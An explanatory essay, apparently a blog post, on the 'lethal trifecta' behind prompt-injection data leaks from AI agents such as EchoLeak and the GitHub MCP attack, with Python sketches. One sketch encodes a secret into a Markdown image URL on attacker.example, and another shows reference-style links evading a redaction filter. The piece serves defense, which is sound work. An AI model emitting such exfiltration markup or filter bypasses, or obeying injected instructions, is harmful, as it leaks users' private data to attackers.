Line up the AI-agent data breaches of the last two years — EchoLeak in Microsoft 365 Copilot, the GitHub MCP repo leak, Slack AI spilling private channels, Google Bard exfiltrating chat history — and a strange thing happens. They stop looking like a list of separate vulnerabilities and start looking like one bug, shipped over and over by different companies.
Simon Willison gave that bug a name in June 2025: the lethal trifecta. An agent is exposed the moment it combines three capabilities — access to private data, exposure to untrusted content, and the ability to communicate externally. Each is harmless alone. Together they are a loaded gun, and prompt injection is the trigger.
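As a rough illustration, the trifecta can be written down as a three-flag check on an agent's configuration. This is a minimal sketch, not an established API: the `AgentCapabilities` class, its field names, and the two example agents are all hypothetical.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class AgentCapabilities:
    """Hypothetical description of what an agent deployment can do."""
    reads_private_data: bool
    reads_untrusted_content: bool
    can_communicate_externally: bool


def has_lethal_trifecta(caps: AgentCapabilities) -> bool:
    # The agent is exposed only when all three capabilities are combined.
    return (
        caps.reads_private_data
        and caps.reads_untrusted_content
        and caps.can_communicate_externally
    )


# Hypothetical deployments: one with all three legs, one with no outbound channel.
inbox_assistant = AgentCapabilities(True, True, True)
offline_summarizer = AgentCapabilities(True, True, False)

print(has_lethal_trifecta(inbox_assistant))
print(has_lethal_trifecta(offline_summarizer))
```

The check is deliberately about the product's wiring, not the model: nothing in it asks how well the model resists injection.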
Why this reframing matters
The instinctive way to describe these incidents is "the AI got tricked." That framing is a dead end, because every model is trickable. You cannot ship your way to a model that reliably distinguishes its operator's instructions from instructions hidden inside the content it was asked to read — the two arrive as the same undifferentiated tokens.
The trifecta moves the blame from the model to the architecture. The model's gullibility is a constant. What varies between a safe agent and a breached one is whether the product wired up an exfiltration path. And here is the part that surprises people: the path is almost never a menacing send_http_request tool. It is usually a rendering primitive nobody thinks of as dangerous.
Data exfiltration in AI agents is a rendering problem wearing an AI costume.
Willison spells out the mechanism: "If a tool can make an HTTP request — to an API, or to load an image, or even providing a link for a user to click — that tool can be used to pass stolen information back to an attacker." The attacker's injected instruction tells the agent to embed your secret in the query string of a Markdown image. The chat client dutifully fetches that image to display it. The secret is now a line in the attacker's web-server log. No click required.
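The Markdown-image channel can be sketched end to end in a few lines. This is an illustration under stated assumptions, not code from any real incident: `attacker.example`, the `d` query parameter, the demo secret, and all three helper functions are hypothetical, and the regex covers only the simplest inline image syntax.

```python
import re
from urllib.parse import parse_qs, urlencode, urlsplit

ATTACKER_HOST = "attacker.example"  # hypothetical attacker-controlled domain


def injected_markdown(secret: str) -> str:
    """What a hijacked agent might emit: an image whose URL carries the secret."""
    query = urlencode({"d": secret})
    return f"![loading](https://{ATTACKER_HOST}/pixel.png?{query})"


# Matches simple inline images of the form ![alt](url).
INLINE_IMAGE = re.compile(r"!\[[^\]]*\]\(([^)\s]+)\)")


def urls_a_client_would_fetch(markdown: str) -> list[str]:
    """URLs a chat client requests automatically when it renders the reply."""
    return INLINE_IMAGE.findall(markdown)


def what_the_attacker_logs(url: str) -> dict[str, list[str]]:
    """The query string as the attacker's web server would record it."""
    return parse_qs(urlsplit(url).query)


reply = injected_markdown("api_key=sk-demo-123")
fetched = urls_a_client_would_fetch(reply)
leaked = what_the_attacker_logs(fetched[0])
print(leaked)
```

Nothing in this flow is a "send data" tool call. The leak happens in the renderer, which is why it is easy to overlook.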
The same exploit, four times
The receipts are remarkably consistent. In 2023, Johann Rehberger showed Google Bard leaking a user's chat history through exactly this image-Markdown channel, fed by an indirect injection planted in a shared Google Doc. In 2024, PromptArmor demonstrated Slack AI leaking the contents of private channels: an attacker posted instructions in a public channel, and a victim's assistant later executed them, rendering the stolen data into a link.
Then came the production-grade ones. EchoLeak (CVE-2025-32711, CVSS 9.3), found by Aim Security, was the first real-world zero-click prompt-injection exfiltration: a single crafted email could make Microsoft 365 Copilot read internal data and leak it with no user interaction at all. Tellingly, its chain defeated several defenses in sequence: it slipped past Microsoft's cross-prompt-injection attack (XPIA) classifier, dodged link redaction by using reference-style Markdown, abused auto-fetched images, and routed the data through a Microsoft Teams proxy that Copilot's Content Security Policy already trusted.
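The reference-style trick is easy to reproduce against a toy filter. The sketch below is not Microsoft's redaction logic, which is not described here. It assumes a hypothetical `naive_redact` function that only knows the inline `[text](url)` form, and shows the same URL surviving once it is moved into a reference definition.

```python
import re

# Matches inline links and images only: [text](url) or ![alt](url).
INLINE_LINK = re.compile(r"!?\[([^\]]*)\]\((?:[^)]*)\)")

# Matches reference definitions such as "[r]: https://host/path".
REFERENCE_DEF = re.compile(r"^[ ]{0,3}\[([^\]]+)\]:\s*(\S+)", re.MULTILINE)


def naive_redact(markdown: str) -> str:
    """Hypothetical filter: replace inline links/images with their text."""
    return INLINE_LINK.sub(r"\1", markdown)


def reference_targets(markdown: str) -> dict[str, str]:
    """URLs that a Markdown renderer would still resolve via references."""
    return {label.lower(): url for label, url in REFERENCE_DEF.findall(markdown)}


inline = "![x](https://attacker.example/p.png?d=SECRET)"
reference = "![x][r]\n\n[r]: https://attacker.example/p.png?d=SECRET"

print(naive_redact(inline))                        # URL removed
print(naive_redact(reference) == reference)        # filter changed nothing
print(reference_targets(naive_redact(reference)))  # URL still reachable
```

The general point is that a filter written against one surface syntax loses to any other syntax the renderer also accepts.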
Invariant Labs' GitHub MCP attack is the cleanest textbook case. A malicious GitHub issue filed in a public repo hijacks a user's agent, which then reads the user's private repos and leaks their contents by opening a public pull request. Invariant was blunt that this "is not a flaw in the GitHub MCP server code itself, but rather a fundamental architectural issue" — there is no server-side patch, because all three legs of the trifecta are present by design. (For the adjacent supply-chain angle, see MCP tool poisoning and rug pulls.)
Why "just detect it" keeps failing
Vendors respond to each incident with a better classifier, researchers respond with a new bypass, and the cycle never converges. Willison explains why with a line worth taping to your monitor: "in security, 99% is a failing grade." A detector that catches 99% of injections sounds great until you remember that the attacker only needs the 1% and can keep trying until they find it. EchoLeak walking straight past a dedicated cross-prompt-injection attack (XPIA) classifier is that principle made concrete.
This is the same lesson the industry has already learned about prompt injection in general: probabilistic filters are a speed bump, not a wall. The OWASP Top 10 for LLM Applications (2025 edition) lists the trigger and the outcome as LLM01 (prompt injection) and LLM02 (sensitive information disclosure), and notably does not promise a detector that closes them.
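The arithmetic behind that line is short. As a back-of-the-envelope sketch, assume each attempt is an independent trial against a detector with a fixed catch rate. That independence is a simplifying assumption made here, not a claim from Willison, and real attackers adapt between tries. Both function names are hypothetical.

```python
import math


def bypass_probability(detection_rate: float, attempts: int) -> float:
    """P(at least one of `attempts` independent tries slips past the detector)."""
    return 1.0 - detection_rate ** attempts


def attempts_for_even_odds(detection_rate: float) -> int:
    """Smallest number of tries that gives the attacker at least a 50% chance."""
    return math.ceil(math.log(0.5) / math.log(detection_rate))


print(attempts_for_even_odds(0.99))              # tries needed for a coin flip
print(round(bypass_probability(0.99, 100), 3))   # chance of success in 100 tries
```

Under these assumptions a 99% detector gives the attacker better-than-even odds within 69 tries and roughly a 63% chance within 100, which is cheap for anyone who can automate the attempts.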
What actually works: remove a leg
If the disease is the combination, the cure is subtraction. Look at the three ingredients and ask which you can remove:
- Private data access — rarely removable. Reading your data is usually the whole point of the agent.
- Untrusted content — rarely removable. An agent that can't read the outside world is barely an agent.
- The outbound channel — this is the one you can cleanly take away.
So the highest-leverage hardening is unglamorous: allowlist outbound domains, disable auto-fetched images and arbitrary link rendering, and put a human approval step in front of consequential actions. Invariant's own advice for the GitHub case — least-privilege tokens, one resource per session — is the same move applied to the data leg.
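Two of those controls, the outbound allowlist and the approval step, can be sketched as plain deterministic checks. Everything named here is an assumption for illustration: the hosts in `ALLOWED_HOSTS`, the tool names in `CONSEQUENTIAL_TOOLS`, and both functions are hypothetical, not part of any specific agent framework.

```python
from urllib.parse import urlsplit

# Hypothetical allowlist of hosts the client may fetch from or link to.
ALLOWED_HOSTS = frozenset({"docs.example.com", "cdn.example.com"})

# Hypothetical tools that publish or send data and so need a human sign-off.
CONSEQUENTIAL_TOOLS = frozenset({"send_email", "create_pull_request"})


def is_allowed_url(url: str, allowed_hosts: frozenset = ALLOWED_HOSTS) -> bool:
    """Allow only https URLs whose exact hostname is on the allowlist."""
    try:
        parts = urlsplit(url)
    except ValueError:  # malformed URL, e.g. a broken IPv6 literal
        return False
    return parts.scheme == "https" and parts.hostname in allowed_hosts


def authorize_tool_call(tool: str, approved_by_human: bool) -> bool:
    """Consequential tools run only after explicit human approval."""
    return tool not in CONSEQUENTIAL_TOOLS or approved_by_human


print(is_allowed_url("https://docs.example.com/guide"))
print(is_allowed_url("https://docs.example.com.attacker.example/p.png"))
print(authorize_tool_call("create_pull_request", approved_by_human=False))
```

Matching on the exact parsed hostname, not on a substring, is what rejects lookalike hosts and `user@host` tricks. The allowlist itself still needs care: EchoLeak got out through a proxy on a domain that was already trusted, so any allowlisted host that forwards requests elsewhere reopens the channel.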
For teams that need a guarantee rather than a mitigation, the frontier is design-level defense. Willison's 2023 Dual LLM pattern keeps a privileged model away from untrusted content entirely; a quarantined model reads the untrusted text but can't call tools. Google DeepMind's CaMeL ("Defeating Prompt Injections by Design") generalizes this, attaching capability metadata to every value so injected instructions structurally can't reach a privileged action or an egress path. CaMeL's reported numbers are partial, not perfect — but they are a different kind of number than a classifier's accuracy: a guarantee-shaped one, not a cat-and-mouse one.
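The core idea, provenance that travels with each value and is checked before a privileged call, can be shown with a toy taint flag. This is a heavily simplified sketch and not CaMeL's implementation or API: the `Value` type, the single `tainted` bit, `combine`, `send_external`, and the policy itself are all hypothetical stand-ins for a much richer capability system.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Value:
    """A string plus provenance: tainted means derived from untrusted content."""
    data: str
    tainted: bool = False


class EgressBlocked(Exception):
    """Raised when untrusted content would choose where data is sent."""


def combine(*parts: Value) -> Value:
    # Taint propagates: anything built from a tainted part is itself tainted.
    return Value("".join(p.data for p in parts), any(p.tainted for p in parts))


def send_external(url: Value, body: Value) -> str:
    # Hypothetical policy: the destination must not come from untrusted input.
    if url.tainted:
        raise EgressBlocked("destination was derived from untrusted content")
    return f"sent {len(body.data)} bytes to {url.data}"


trusted_url = Value("https://api.example.com/report")
injected_url = combine(Value("https://"), Value("attacker.example/c", tainted=True))
report = Value("quarterly numbers")

print(send_external(trusted_url, report))
try:
    send_external(injected_url, report)
except EgressBlocked as err:
    print("blocked:", err)
```

The check never inspects what the injected text says. It only asks where the value came from, which is why this style of defense does not depend on out-guessing the attacker's wording.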
That is the real shift underway. The industry is mid-pivot from "detect the attack," which it keeps losing, to "deny the capability," which it can actually reason about. The lethal trifecta is the map for that pivot: you don't have to make your agent unfoolable. You just have to make sure that when it is fooled — and it will be — there's no door left open for the data to walk out of. For the broader threat model these attacks live inside, see the OWASP Top 10 for LLM applications.



